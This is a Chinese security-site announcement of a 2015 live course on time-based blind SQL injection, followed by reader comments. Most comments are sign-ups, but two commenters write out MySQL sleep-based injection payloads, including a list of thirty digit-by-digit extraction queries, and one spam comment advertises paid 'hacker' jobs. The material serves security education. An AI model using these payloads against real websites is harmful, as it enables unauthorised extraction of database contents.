互联网安全在线教育旗舰

FreeBuf公开课(直播课程):突破延时注入的时间限制

课程简介

什么是延时注入?延时注入的原理又是什么?

“注入越来越少,同时也越来越隐蔽。
而延时注入的出现确是让人又爱又恨。”

本次公开课特邀讲如果M微笑(张炳帅)将给大家带来秒杀国外延时注入工具的实例(SQLMAP也未能幸免哦)而又如何突破延时注入受时间干扰难题呢?8月26日晚,xxser给大家带来延时注入专题公开课直播讲座,延时注入基本原理,实际应用,实例分析,以及延时注入弊端及其突破。敬请期待o(^▽^)o

直播时间

8月26日 20:00 – 21:00

讲师

如果M微笑(张炳帅),《Web安全深度剖析》一书作者,国内著名Web安全研究团队破晓成员。米安网创始人之一,信息安全高级研究员,从事信息安全研究6年,擅长渗透测试、安全事件应急响应及安全工具研发,做过多个国家级信息安全项目。

报名地址

http://open.freebuf.com/inland/574.html 为保证授课质量,听课人数将有所限制。 您可以通过以上链接免费报名(优先通过FreeBuf活跃用户),也可以花费1金币购买门票。

 

*FreeBuf公开课投稿/开课欢迎联系video@freebuf.com

已有 84 条评论

  1. cafexss ( 4 级) root@localhost
    2015-08-22 at 15:45 #

    。。

    回复
    • dlan ( 3 级) xx00
      2015-08-23 at 11:08 #

      123@cafexss

      回复
  2. Qiudays ( 1 级) 
    2015-08-22 at 15:47 #

    这…..

    回复
  3. K0r4dji ( 1 级) 破晓团队(Pox Team) www.secbug.org
    2015-08-22 at 16:15 #

    Open the door he is 天阔~

    回复
  4. Jumbo ( 6 级) 论坛https://www.chinabaiker.com
    2015-08-22 at 16:16 #

    上次亏了

    回复
    • banish ( 6 级) 天地不仁 万物刍狗
      2015-08-22 at 17:57 #

      @Jumbo 这次不会让你失望哟~

      回复
      • Jumbo ( 6 级) 论坛https://www.chinabaiker.com
        2015-08-22 at 22:22 #

        @banish 不是说课程差,是指金币亏了

        回复
        • banish ( 6 级) 天地不仁 万物刍狗
          2015-08-23 at 12:55 #

          @Jumbo 才一个金币哟~

          回复
  5. 心在想念 ( 2 级) 
    2015-08-22 at 19:12 #

    求票…

    回复
  6. mxf567 ( 1 级) 新手学习中。希望认识一些朋友,一起交流学习,一起进步~!
    2015-08-22 at 19:57 #

    求批准

    回复
  7. helloboy ( 1 级) 
    2015-08-22 at 20:02 #

    我是来看有没有免费票的嘿嘿~~

    回复
  8. 疯er ( 1 级) 
    2015-08-22 at 20:08 #

    求通过

    回复
  9. tq107191614  
    2015-08-22 at 20:11 #

    报名

    回复
  10. 风之色巴斯坦 ( 1 级) 
    2015-08-22 at 20:45 #

    报名学习!!!

    回复
  11. wxy87fly ( 1 级) 
    2015-08-22 at 21:42 #

    期待~~希望可以通过哦

    回复
  12. assassion12345 ( 1 级) 
    2015-08-22 at 21:54 #

    同求票
    突破时间限制这才是关键点

    回复
  13. Eysen ( 1 级) 
    2015-08-22 at 21:59 #

    希望能通过!!!

    回复
  14. Hacker__ ( 1 级) 
    2015-08-22 at 22:07 #

    一直在关注FreeBuf的公开课
    第一期是wireshark,内容很充实
    第二期是关于注入的希望继续有机会听课
    求免费听课

    回复
  15. feicunfeifei ( 1 级) 
    2015-08-22 at 22:21 #

    金币少。。刚买了wireshark。。求免费听课。。

    回复
  16. andy88 ( 5 级) 我相信我加入互联网,就是我未来的路、希望有大神关注http:...
    2015-08-22 at 22:23 #

    已经报名咯。期待技术改便一切的我,

    回复
  17. K0r4dji ( 1 级) 破晓团队(Pox Team) www.secbug.org
    2015-08-22 at 23:18 #

    好心的FreeBuf哥哥姐姐们啊….各种管理大大们啊!
    让我的楼上 和 楼下所有评论的人免费听课吧~
    (*^__^*) 嘻嘻……

    回复
  18. MEisQ ( 2 级) 111000000111110001011001100001...
    2015-08-23 at 01:19 #

    我要报名

    回复
  19. wjymzh ( 1 级) 
    2015-08-23 at 08:37 #

    我想报名

    回复
  20. xxl ( 1 级) 
    2015-08-23 at 08:51 #

    我要报名

    回复
  21. lnterface ( 2 级) 
    2015-08-23 at 09:16 #

    我要报名,但是没金币

    回复
  22. 大夫 ( 3 级) 
    2015-08-23 at 09:28 #

    我竟然还有两个金币,噢耶!

    回复
  23. ybbb ( 1 级) 
    2015-08-23 at 10:01 #

    好想学习 给给机会俺好吗

    回复
  24. Petrel ( 2 级) 刻意的去追求 不如一切随缘 自然的去生活 相信生命会更迷人
    2015-08-23 at 11:07 #

    这么多人 呀

    回复
  25. sany ( 1 级) 
    2015-08-23 at 11:10 #

    求通过

    回复
  26. weirdbird007 ( 3 级) 干过开发,日过渗透,某乙方渗透>_< '...
    2015-08-23 at 12:18 #

    哎呀。。结束了才买。。 有视频放出来么

    回复
    • banish ( 6 级) 天地不仁 万物刍狗
      2015-08-23 at 12:55 #

      @weirdbird007 还木有结束啊 还没开始咩- -

      回复
  27. 肥脸宝宝 ( 1 级) 
    2015-08-23 at 13:03 #

    怎么得金币, 我也想报名啊啊啊啊啊啊啊

    回复
    • 路过  
      2015-08-23 at 23:10 #

      @肥脸宝宝 发文章或者提漏洞~

      回复
  28. f4ck111 ( 1 级) 
    2015-08-23 at 13:11 #

    没金币呀。。

    回复
  29. guanji ( 4 级) 穿梭在网络边界,隐藏在普通人群之中
    2015-08-23 at 14:02 #

    没有钱啊 怎么办

    回复
  30. x44x53x69x6dx75x6e ( 1 级) 
    2015-08-23 at 18:19 #

    没钱,求批准!!

    回复
  31. sen  
    2015-08-23 at 18:48 #

    报名

    回复
  32. Selincuo ( 1 级) 
    2015-08-23 at 19:51 #

    报名~~~~

    回复
  33. 米安-322-小锟 ( 1 级) 
    2015-08-23 at 21:01 #

    支持,。天阔

    回复
  34. zzitt ( 1 级) 不会写程序的小程序员~
    2015-08-23 at 23:16 #

    非常感兴趣,求课程

    回复
  35. adm8n ( 1 级) 
    2015-08-24 at 10:00 #

    已报名, 哈哈

    回复
  36. cnb ( 1 级) 风暴之灵在战斗
    2015-08-24 at 10:21 #

    怎么报名,只能花金币?

    回复
  37. ccforever ( 1 级) 
    2015-08-24 at 10:38 #

    求通过啊

    回复
  38. yiran4827 ( 4 级) 姿势可以不猥琐,人一定要猥琐
    2015-08-24 at 10:39 #

    求报名

    回复
  39. jack ( 3 级) 
    2015-08-24 at 10:46 #

    报名

    回复
  40. Jovi ( 1 级) 
    2015-08-24 at 11:04 #

    报名~~

    回复
  41. 一枚小屌丝 ( 1 级) 
    2015-08-24 at 11:13 #

    报名报名!

    回复
  42. liusn ( 1 级) 
    2015-08-24 at 11:24 #

    求过!!

    回复
  43. 小鲜肉 ( 1 级) 
    2015-08-24 at 13:01 #

    报名,求通过

    回复
  44. zxlwwl ( 1 级) 
    2015-08-24 at 14:53 #

    报名,求通过

    回复
  45. freeplayer ( 1 级) 
    2015-08-24 at 15:45 #

    pass

    回复
  46. tc01680  
    2015-08-24 at 19:44 #

    我要报名,,,,

    回复
  47. H_H ( 1 级) 
    2015-08-24 at 19:58 #

    我要报名。。。。

    回复
  48. Mcici ( 1 级) 
    2015-08-25 at 10:29 #

    报名报名!

    回复
  49. cngod ( 1 级) 
    2015-08-25 at 12:12 #

    希望我能通过- -!

    回复
  50. O_O ( 1 级) 
    2015-08-25 at 18:27 #

    报个名。

    回复
  51. misshack ( 1 级) 
    2015-08-25 at 19:14 #

    求通过~~~

    回复
  52. 汪车人 ( 1 级) 
    2015-08-25 at 20:40 #

    买了《Web安全深度剖析》这本书,希望作者大大能通过我的报名(〜 ̄△ ̄)〜

    回复
  53. 大写f ( 1 级) 
    2015-08-25 at 21:52 #

    求审核,学习学习

    回复
  54. kongll  
    2015-08-26 at 09:25 #

    破晓团队(Pox Team) http://www.secbug.org

    回复
  55. 亲爱的兔子 ( 8 级) 前进的兔子君。
    2015-08-26 at 09:41 #

    报个名求通过

    回复
  56. idle fire ( 1 级) 
    2015-08-26 at 11:02 #

    求露脸。

    回复
  57. liondota ( 1 级) 
    2015-08-26 at 12:42 #

    报了名了,求通过,想了解学习这块技术。

    回复
  58. vivym ( 1 级) 
    2015-08-26 at 14:55 #

    报个名求通过

    回复
  59. sb ( 1 级) 
    2015-08-26 at 15:04 #

    新手来听课,求通过

    回复
  60. lonely_wind ( 1 级) 
    2015-08-26 at 15:32 #

    大概是通过dns注入?

    回复
  61. 飞扬飞  
    2015-08-26 at 16:01 #

    上一期听过,高大上。

    回复
  62. Xkercrv ( 1 级) 
    2015-08-26 at 17:11 #

    。破晓大神齐聚freebuf,k阔完了天哥也来

    回复
  63. wdstlala ( 1 级) 
    2015-08-26 at 17:59 #

    已经6年研究了,我才2个月不到,得一直坚持下去!

    回复
  64. 馆长 ( 1 级) 
    2015-08-26 at 21:13 #

    好紧张好害怕

    回复
  65. ghost119 ( 2 级) 
    2015-08-26 at 22:58 #

    哎,下班回来晚了,又错过了时间

    回复
    • llopppp ( 4 级) FreeBuf认证萌物 专业的卖萌 不专业的前端Java
      2015-08-28 at 15:12 #

      @ghost119 没关系的,回播已经上线~请重新登陆本页进行查看

      回复
  66. kissy ( 1 级) 
    2015-08-27 at 11:29 #

    期待啊 !

    回复
  67. Mr.Black  
    2015-08-29 at 09:22 #

    这操作,这表达方式我也是醉了

    回复
  68. xp_cmdshell  
    2015-09-10 at 10:40 #

    自认为像你那种演示环境,直接这一句 and if((mid(version(),1,1)>12),1,sleep(0)) 就可以搞定了,无需搞的那么复杂,无需lpad函数和bin函数,这一句直接设置延时时间为0了,然后通过页面关键字就可以判断出来了,这一句不管你如何折半,都不会延时,只不过执行了sleep的时候无返回结果而已,很容易就对比出结果

    回复
  69. GodLikesSmile ( 1 级) 
    2015-09-10 at 13:52 #

    PPT有分享吗,在哪可以找到?

    回复
  70. xukeying ( 1 级) 
    2015-09-24 at 20:46 #

    高新聘请黑客高手,月薪10万至50 QQ:3046503729

    回复
  71. 白菜123 ( 1 级) 
    2015-10-02 at 22:11 #

    整个教程东扯西扯的

    回复
  72. shack2  
    2015-10-03 at 18:23 #

    看了这种方法,其实和传统延时注入,最大的区别就是,这种方式获取一个字符,可以利用多线程一次将包发送出去,在程序中判断每一个包是否有延时,在组成二进制,然后转换成字符,而传统延时注入利用二分法(半折算法)只能使用单线程去获取值,因为只有判断出了ascii码的值的区间了才能继续往下判断,这样就利用多线程赢得了大量的时间。
    如果考虑两种方法都是单线程的状态下,其实差距不大。
    计算如下:
    单线程方式
    通常二分法确定一个字符的值平均发包次数在8次左右(常见ascii码范围0-127,64-32-16-8-4-2-1)
    在8次请求中,判断需要延时的次数,平均在3到4次左右,延时时间按照2秒计算,忽略每次发包需要的时间。
    那么传统算法总时间=4*2s=8秒。
    二进制延时算法,出现1的次数一般在2到4次,按照平均值计算,所以总时间=3*2s=6秒。
    区别在与,用二进制延时的发,需要延时的次数减少,所以速度较快。
    所以在单线程上实际上没有特别明显的优势,优势体现在多线程上。

    其实还有一种算法,但是得考累网络环境较好,每次发包响应的时间非常良好,这中方式更有优势
    Ascii码的范围在0-127,通常是3位,可以截取每一位来判断,那每一位范围在0到9,使用10个线程同时发包,其中只有一个线程会延时
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=1),sleep(2),0)

    那么判断一个字符的值,通过ascii码方式判断,最多只需要30个包就能判断出来,如果10个线程那么不考虑发包时间,延时3次在6秒左右,如果30个线程那么只需要最多两秒。如果ascii码是两位数那么更快。和二进制延时谁更好,有待研究。

    注:上述方式都没有考类中文值的情况。

    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=0),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=1),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=2),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=3),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=4),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=5),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=6),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=7),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=8),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),1,1)=9),sleep(2),0)

    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=0),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=1),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=2),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=3),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=4),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=5),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=6),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=7),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=8),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),2,1)=9),sleep(2),0)

    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=0),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=1),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=2),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=3),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=4),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=5),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=6),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=7),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=8),sleep(2),0)
    select * from news where id=1 and if((substr(ascii(‘a’),3,1)=9),sleep(2),0)

    回复
  73. purpleforest ( 1 级) 
    2015-10-22 at 12:25 #

    有ppt下载吗?求分享

    回复
  74. 赵健康  
    2015-11-19 at 12:35 #

    国外

    回复
  75. 2701508899 ( 1 级) 
    2016-03-10 at 12:18 #

    在哪里报名啊?

    回复
    • llopppp ( 4 级) FreeBuf认证萌物 专业的卖萌 不专业的前端Java
      2016-03-10 at 16:07 #

      @2701508899 不用报名了,直接观看就可以了..视频在页面的上方

      回复
  76. jushi  
    2016-05-24 at 12:26 #

    看了之后有点存疑。算上所有ascii码,7bit可以表示完,sqlmap使用的二分法判断和张老师提到的二进制判断本质上是一样的,二分法只需最多7次就可以判断完,二进制也是要7次。shake2说的有道理,其实是多线程的作用才使得课程中注入时间少很多。

    回复

亲,说说对课程的看法吧

您当前尚未登录。注册

css.php